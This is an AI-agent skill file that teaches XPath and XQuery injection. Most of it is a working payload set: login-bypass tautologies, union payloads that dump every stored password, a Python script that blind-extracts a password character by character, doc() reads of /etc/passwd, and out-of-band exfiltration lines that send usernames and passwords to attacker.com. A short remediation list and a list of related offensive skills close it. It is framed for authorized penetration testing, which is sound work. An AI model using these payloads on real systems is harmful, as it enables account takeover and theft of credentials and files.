exploiting-xpath-injection

Name: exploiting-xpath-injection
Author: xalgord/xalgorix

$npx mdskill add xalgord/xalgorix/exploiting-xpath-injection

- During authorized tests where the app stores users/data in an XML file and queries it with XPath - When login forms or search features build expressions like `//user[name='INPUT' and password='INPUT']` - When you see XML-backed config, SOAP endpoints, or apps using `simplexml`, `DOMXPath`, `javax.xml.xpath` - When error messages reference XPath, XQuery, or XML parsing - When testing XPath 2.0+ engines that expose `doc()`, `unparsed-text()`, or `string-to-codepoints()`

SKILL.md

.github/skills/exploiting-xpath-injectionView on GitHub ↗

---
name: exploiting-xpath-injection
description: Exploiting XPath injection where applications build XPath/XQuery expressions from unsanitized user input to
  query XML documents, allowing authentication bypass and blind extraction of the entire XML document (users, passwords,
  schema) plus out-of-band exfiltration. Activates when login or search features query XML data stores via XPath.
domain: cybersecurity
subdomain: web-application-security
tags:
- penetration-testing
- xpath-injection
- xquery-injection
- authentication-bypass
- owasp
- web-security
version: '1.0'
author: xalgorix
license: Apache-2.0
---

# Exploiting XPath Injection

## When to Use

- During authorized tests where the app stores users/data in an XML file and queries it with XPath
- When login forms or search features build expressions like `//user[name='INPUT' and password='INPUT']`
- When you see XML-backed config, SOAP endpoints, or apps using `simplexml`, `DOMXPath`, `javax.xml.xpath`
- When error messages reference XPath, XQuery, or XML parsing
- When testing XPath 2.0+ engines that expose `doc()`, `unparsed-text()`, or `string-to-codepoints()`

## Critical: Variants Most Often Missed

In XPath there is no comment/terminator like SQL `--`, so payloads must keep the expression valid. Remember **`and` binds tighter than `or`**. Test this matrix on every field:

```text
# 1. Authentication bypass (boolean tautology)
' or '1'='1            " or "1"="1            ' or ''='            " or ""="
' or 1]%00             # null-byte to cut the rest of the expression
admin' or '1'='2       # select a KNOWN account, ignore password

# 2. First-match selection (no spaces needed too)
' or /* or '           ' or "a" or '          ' or 1 or '          ' or true() or '

# 3. Conditional account selection (blind oracles)
'or string-length(name(.))<10 or'     # accounts whose node name < 10 chars
'or contains(name,'adm') or'          # first account whose name contains 'adm'
'or contains(.,'adm') or'             # first account whose current value contains 'adm'
'or position()=2 or'                  # select the 2nd account

# 4. Node-set extraction in string-output contexts (search boxes)
') or 1=1 or ('                       # get all names
') or 1=1] | //user/password[('')=('  # names AND passwords
')] | //user/*[1] | a[('              # the 1st child (id) of every user
')] | //password%00                   # all passwords (null injection)
')]/../*[3][text()!=('                # all passwords via sibling axis

# 5. Blind boolean extraction (substring oracle)
' or substring((//user[position()=1]/child::node()[position()=1]),1,1)="a" or ''='
' or string-length(//user[position()=1]/child::node()[position()=1])=4 or ''='
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_HERE)

# 6. Schema discovery (when tag names unknown)
and count(/*)=1                       # root count
and name(/*[1])="root"                # confirm tag name
and string-to-codepoints(substring(name(/*[1]/*[1]/*),1,1))=105   # codepoint of a tag char
```

XPath 2.0 file read / OOB exfiltration:

```text
# Read protected files (XPath 2.0+)
(substring((doc('file://protected/secret.xml')/*[1]/*[1]/text()[1]),3,1))) < 127
# Out-of-band exfiltration via doc()/doc-available()
doc(concat("http://attacker.com/oob/", encode-for-uri(/Employees/Employee[1]/username)))
doc-available(concat("http://attacker.com/oob/", name(/*[1]/*[1])))
# Error-based oracle (XQuery)
... and ( if ( $employee/role = 2 ) then error() else 0 )...
```

### How to CONFIRM a hit (avoid false negatives)

- **Auth bypass**: `' or '1'='1` (and quote/double-quote variants) logs you in or returns a record.
- **Boolean blind**: TRUE payload returns data / differs from a FALSE payload; e.g. `...substring(...,1,1)="a"...` flips the response.
- **Node extraction**: union `|` payloads return MORE rows than the legitimate query (all names/passwords).
- **Error-based**: `error()` in an XQuery branch produces a distinct error/timing only when the condition matches.
- **OOB**: a `doc()`/`doc-available()` callback reaches your server, carrying the exfiltrated value in the path.
- Always compare against a baseline response — a stable difference (length/content/status/time) confirms injection even with no echoed data.

## Workflow

### Step 1: Detect

```bash
# Break the expression and watch for XPath/XML errors or behavior change
curl -s "https://target/login" --data "user=test'&pass=x"          # syntax error?
curl -s "https://target/login" --data "user=' or '1'='1&pass=x"     # bypass?
```

### Step 2: Authentication Bypass

```bash
# Target query: string(//user[name/text()='U' and password/text()='P']/account/text())
user=' or '1'='1     pass=' or '1'='1
# Known username, ignore password:
user=admin' or '1'='2     pass=anything
```

### Step 3: Extract Data (node-set union + blind)

```bash
# Search box context: string(//user/username[contains(., 'VALUE')])
# Dump every username and password:
VALUE=') or 1=1] | //user/password[('')=('
curl -s "https://target/search?q=$VALUE"
```

```python
#!/usr/bin/python3
# Blind XPath password extraction (adapted from HackTricks)
import requests, string
alphabet = string.ascii_letters + string.digits + "{}_()"
# 1) find length
length = 0
for i in range(30):
    r = requests.get(f"http://example.com?action=user&userid=2 and string-length(password)={i}")
    if "TRUE_COND" in r.text:
        length = i; break
# 2) recover each char
flag = ""
for i in range(1, length + 1):
    for c in alphabet:
        r = requests.get(f"http://example.com?action=user&userid=2 and substring(password,{i},1)={c!r}")
        if "TRUE_COND" in r.text:
            flag += c; print("[+]", flag); break
```

### Step 4: File Read / OOB Exfiltration (XPath 2.0+)

```text
# Read an XML/text file from disk
//*[substring((doc('file:///etc/passwd')),1,30)]
# Exfiltrate via OOB when no response oracle exists
doc(concat("http://attacker.com/x/", encode-for-uri(/Employees/Employee[1]/password)))
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **XPath / XQuery** | Query languages for navigating/selecting nodes in XML documents |
| **No comment sequence** | Unlike SQL, payloads must keep the whole expression syntactically valid |
| **`and` > `or` precedence** | `and` evaluates first; craft tautologies accordingly |
| **Union `|`** | Combine node-sets to dump data beyond the intended query |
| **Boolean/substring oracle** | `string-length()` + `substring()` to brute-force values blindly |
| **`doc()` / `doc-available()`** | XPath 2.0 functions enabling file read and OOB exfiltration |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| **xcat** | Automated blind XPath retrieval (incl. OOB, file read) |
| **xxxpwn / xxxpwn_smart** | Blind XPath injection exploitation |
| **xpath-blind-explorer** | Interactive blind extraction helper |
| **XmlChor** | XPath injection exploitation tool |
| **Burp Suite Intruder** | Boolean/substring brute force with grep-match oracles |
| **PayloadsAllTheThings (XPATH Injection)** | Payload reference |

## Common Scenarios

### Scenario 1: XML-Backed Login Bypass
A login authenticates against `users.xml` via `//user[name='U' and password='P']/account`. `' or '1'='1` in both fields makes the predicate always true and returns the first account (often admin).

### Scenario 2: Search Box Data Dump
A search runs `//user/username[contains(., 'INPUT')]`. Injecting `') or 1=1] | //user/password[('')=('` unions the password node-set into the result, leaking every stored password.

### Scenario 3: Blind Extraction with No Echo
The app returns the same page regardless of match, but timing/length differs for true conditions. A `substring(password,i,1)=...` loop recovers the admin hash character by character.

## Output Format

```
## XPath Injection Finding

**Vulnerability**: XPath / XQuery Injection
**Severity**: High to Critical (CVSS 8.1–9.8 for auth bypass / full data extraction)
**Location**: POST /login (user, pass) or GET /search?q=
**OWASP Category**: A03:2021 - Injection

### Reproduction Steps
1. Submit user=' or '1'='1 and pass=' or '1'='1 → authenticated as first account.
2. In search, send ') or 1=1] | //user/password[('')=(' → all usernames and passwords returned.
3. Blind-extract admin password with substring()/string-length() oracle.

### Evidence
| Payload | Result | Meaning |
|---------|--------|---------|
| ' or '1'='1 | Login success | Tautology bypass |
| substring(password,1,1)="p" | TRUE_COND | First char = p |
| union //user/password | Extra rows | Full document dump |

### Impact
Authentication bypass, full extraction of the backing XML document (users, passwords, schema), and on XPath 2.0 engines local file read and OOB data exfiltration.

### Recommendation
1. Use parameterized XPath (variable binding / XQuery external variables), never string concatenation.
2. Escape/encode quotes and metacharacters; validate input against strict allow-lists.
3. Disable external document access (`doc()`, network/file resolvers) in the XPath engine.
4. Store credentials hashed; avoid keeping secrets in XPath-queried XML where possible.
```

More from xalgord/xalgorix

Skill	Description
abusing-hop-by-hop-headers	Testing proxies, load balancers, and CDNs for improper handling of HTTP hop-by-hop headers, where an
analyzing-macos-persistence-and-autostart	Enumerating, planting, and hunting macOS persistence and auto-start (ASEP) locations during authorized
api-discovery	API endpoint discovery including OpenAPI/Swagger detection, hidden versioning, REST/GraphQL enumeration, and content negotiation
bypassing-binary-exploitation-mitigations	Methodology for identifying and defeating common binary hardening mitigations during authorized exploitation —
bypassing-captcha-protections	Identifying weaknesses in CAPTCHA implementations and bypassing them via replay, field removal,
bypassing-macos-gatekeeper-tcc-and-sip	Assessing and bypassing macOS userland and platform security controls during authorized engagements -
bypassing-restricted-shells	Escaping restricted shells (rbash, rksh, lshell), chroot jails, and language sandboxes (Lua, Python)
bypassing-two-factor-and-otp	Identifying and exploiting flaws in two-factor authentication and one-time password verification
deep	Exhaustive security assessment with maximum coverage, depth, and vulnerability chaining
exploiting-ai-model-file-rce	Testing machine-learning model files and model-loading services for remote code execution caused by insecure